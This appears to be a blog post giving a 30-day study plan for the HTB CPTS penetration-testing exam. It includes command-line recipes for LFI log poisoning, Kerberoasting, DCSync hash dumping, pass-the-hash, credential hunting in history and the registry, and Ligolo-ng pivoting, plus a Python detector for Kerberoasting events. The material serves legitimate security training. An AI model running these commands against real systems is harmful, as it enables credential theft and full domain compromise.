How I'm Preparing for HTB CPTS in 30 Days
The HTB Certified Penetration Testing Specialist (CPTS) is one of the most respected hands-on cybersecurity certifications available today. Unlike multiple-choice exams, CPTS is a 10-day practical exam where you perform a real penetration test against a multi-machine Active Directory environment and submit a professional report. No braindumps. No shortcuts.
This is how I'm structuring my 30-day sprint to pass it.
// Understanding the CPTS Exam
Before building a prep plan, you need to understand exactly what the exam tests:
- Format: Grey-box — you receive a scope document, starting network access, and low-privilege credentials
- Duration: 10-day exam window (exploitation + report writing)
- Environment: Multi-machine AD network with internal pivot requirements
- Deliverable: Professional penetration testing report (this is the submission)
- Coverage: Web application testing, Active Directory attacks, privilege escalation, pivoting, and reporting
The exam is graded on your report, not on which machines you compromised. A well-written report documenting 5 findings will beat a sloppy report listing 10 findings every time.
// The 30-Day Plan
| Days | Focus | Deliverable |
|---|---|---|
| 1-7 | Fundamentals + Enumeration modules | Nmap, Footprinting, Web recon solid |
| 8-14 | Web attacks + Exploitation modules | SQLi, XSS, file inclusion, shells comfortable |
| 15-21 | Active Directory (the exam core) | BloodHound, Kerberoasting, ACL abuse, AD CS |
| 22-26 | Privilege escalation + Pivoting | Linux/Windows privesc, Ligolo-ng, chisel |
| 27-28 | Report writing practice | Write 3 full findings from labs you've done |
| 29-30 | Tool setup + weak area review | Everything installed, templates ready |
// Week 1: Fundamentals and Enumeration
Most people rush through enumeration modules to get to "the fun stuff." This is the wrong approach. Every CPTS machine requires methodical enumeration — the foothold is enumeration.
Daily structure:
- Morning (1 hr): Read the module theory
- Afternoon (2 hrs): Complete all module exercises on HTB
- Evening (1 hr): Review flashcards + document what you learned
Key focus areas this week:
- Nmap two-pass method — nmap -p- first, then targeted deep scan
- SMB null sessions — enum4linux-ng -A target
- SNMP community strings — onesixtyone + snmpwalk
- DNS zone transfers — dig axfr @nameserver domain.com
- Web fuzzing with ffuf — directories, VHosts, parameters
// Week 2: Web Application Attacks
CPTS has significant web app coverage. The web modules prepare you for finding and exploiting SQL injection, file inclusion, XSS, command injection, and file upload vulnerabilities in real applications — not just toy examples.
Priority modules:
- SQL Injection Fundamentals (understand UNION, error-based, blind)
- File Inclusion (LFI → RCE via log poisoning, PHP wrappers)
- File Upload Attacks (bypass MIME, extension, and content checks)
- Command Injection (bypass filters, use various separators)
- Web Attacks (IDOR, XXE, SSRF — these appear in the exam)
# LFI to RCE via log poisoning
curl -s 'http://target/page.php?file=/var/log/apache2/access.log'
# First: poison the log with PHP code in User-Agent
curl -A '' http://target/
# Then: execute commands via LFI
curl 'http://target/page.php?file=/var/log/apache2/access.log&cmd=id'
// Week 3: Active Directory (The Exam Core)
This is where the exam is won or lost. The CPTS environment is an Active Directory network. If you don't know AD attacks cold, you will run out of time.
Non-negotiable AD skills:
- BloodHound — collect all data, find shortest path to Domain Admins, identify Kerberoastable accounts and DCSync rights
- Kerberoasting — GetUserSPNs.py domain/user:pass -dc-ip DC -request → hashcat -m 13100
- AS-REP Roasting — GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC → hashcat -m 18200
- DCSync — secretsdump.py domain/admin:pass@DC — dumps all domain hashes
- Pass-the-Hash — nxc smb target -u admin -H [NTLM hash]
- ACL Abuse — ForceChangePassword, GenericWrite for targeted Kerberoasting
- AD CS ESC1 — certipy find, enroll in vulnerable template, PKINIT to get TGT
# Complete Kerberoasting chain
impacket-GetUserSPNs corp.local/svc_user:Password1 -dc-ip 10.10.10.5 -request -outputfile spns.txt
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt --force
# DCSync (requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights)
impacket-secretsdump corp.local/admin:Password1@10.10.10.5 -just-dc-ntlm
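From the defender's side, the Kerberoasting chain above shows up on the domain controller as Kerberos service ticket requests (Security event 4769) with RC4 encryption type 0x17, which is the detail a finding's remediation section should mention. The following is an added example, not part of the original post, that flags that pattern in a constructed log; the flattened line format, SAMPLE_4769, and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4769 records, flattened to:
# time  TargetUserName  ServiceName  TicketEncryptionType
SAMPLE_4769 = """\
2024-05-01T09:00:00 alice@CORP.LOCAL FILESRV01$ 0x12
2024-05-01T09:14:10 bob@CORP.LOCAL svc_sql 0x17
2024-05-01T10:30:01 svc_user@CORP.LOCAL svc_sql 0x17
2024-05-01T10:30:01 svc_user@CORP.LOCAL svc_backup 0x17
2024-05-01T10:30:02 svc_user@CORP.LOCAL svc_web 0x17
2024-05-01T10:30:02 svc_user@CORP.LOCAL krbtgt 0x12
"""

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 targets


def parse(log):
    """Yield (timestamp, requester, service, etype) from the flattened lines."""
    for line in log.splitlines():
        if line.strip():
            ts, user, service, etype = line.split()
            yield datetime.fromisoformat(ts), user.split("@")[0], service, int(etype, 16)


def kerberoast_suspects(log, min_services=3, window=timedelta(minutes=5)):
    """Return {requester: services} for accounts that requested RC4 tickets
    for at least min_services distinct user-backed services inside the window."""
    hits = defaultdict(list)
    for ts, requester, service, etype in parse(log):
        # Machine accounts ($) and krbtgt use long random passwords: skip them.
        if etype == RC4_HMAC and not service.endswith("$") and service != "krbtgt":
            hits[requester].append((ts, service))
    suspects = {}
    for requester, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {svc for t, svc in events[i:] if t - start <= window}
            if len(seen) >= min_services:
                suspects[requester] = sorted(seen)
                break
    return suspects
```

A single RC4 request (bob in the sample) stays below the threshold; tune min_services and window to the environment's normal service ticket traffic.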
// Week 4: Privilege Escalation and Pivoting
Linux PrivEsc checklist (memorize this order):
sudo -l # Sudo rights — fastest path
find / -perm -4000 2>/dev/null # SUID binaries
getcap -r / 2>/dev/null # Capabilities
cat /etc/crontab; ls /etc/cron.d # Cron jobs
env # Environment variables
cat ~/.bash_history # Command history
./linpeas.sh | tee linpeas.txt # Automated scan
Windows PrivEsc checklist:
whoami /priv # SeImpersonatePrivilege → PrintSpoofer
.\winPEAS.exe > peas.txt # Automated scan
reg query HKLM /f password /t REG_SZ /s # Registry creds
cmdkey /list # Stored credentials
sc qc VulnerableService # Weak service permissions
Pivoting with Ligolo-ng:
# Attacker: start proxy
./proxy -selfcert -laddr 0.0.0.0:11601
# Compromised host: connect agent
./agent -connect ATTACKER:11601 -ignore-cert
# In Ligolo console:
session # select session
start # start tunnel
# On attacker: add route to internal subnet
ip route add 172.16.5.0/24 dev ligolo
# Now scan internal subnet directly — no proxychains needed
// Days 27-28: Report Writing Practice
Don't write your first real finding during the exam. Practice writing 3 complete findings from machines you've already compromised:
- Pick a CVE you exploited on an HTB machine
- Write: title, CVSS 3.1 score with vector string, affected host, numbered PoC steps with screenshots, business impact, remediation steps
- Time yourself — aim for under 15 minutes per finding
Set up SysReptor now: install it, configure your finding templates, and export a test PDF to verify your setup works.
// Days 29-30: Pre-Exam Checklist
- All tools installed and verified working (certipy --version, nxc --version, etc.)
- CherryTree/Obsidian note template ready with sections for each host
- SysReptor running with blank report template
- VPN connected to HTB, tun0 verified
- Wordlist directory organized: rockyou, SecLists subdomains, SecLists web-content
- GitHub cheatsheet/personal notes bookmarked
- Full night's sleep before exam start
// Key Resources
- HTB CPTS Path — complete 100% of all modules including exercises
- HackTricks — the most comprehensive attack reference available
- GTFOBins — Linux binary exploitation for privesc
- LOLBAS — Windows LOLBin reference
- ired.team — outstanding AD attack reference
- HTB Machines: Forest, Blackfield, Monteverde, Cascade, Sauna (all AD-focused)
- This site — flashcards, exercises, and the mind map to track everything
Use this companion's 40 modules, exercises, flashcards, and mind map to structure your preparation. Everything here is built around the actual CPTS exam objectives.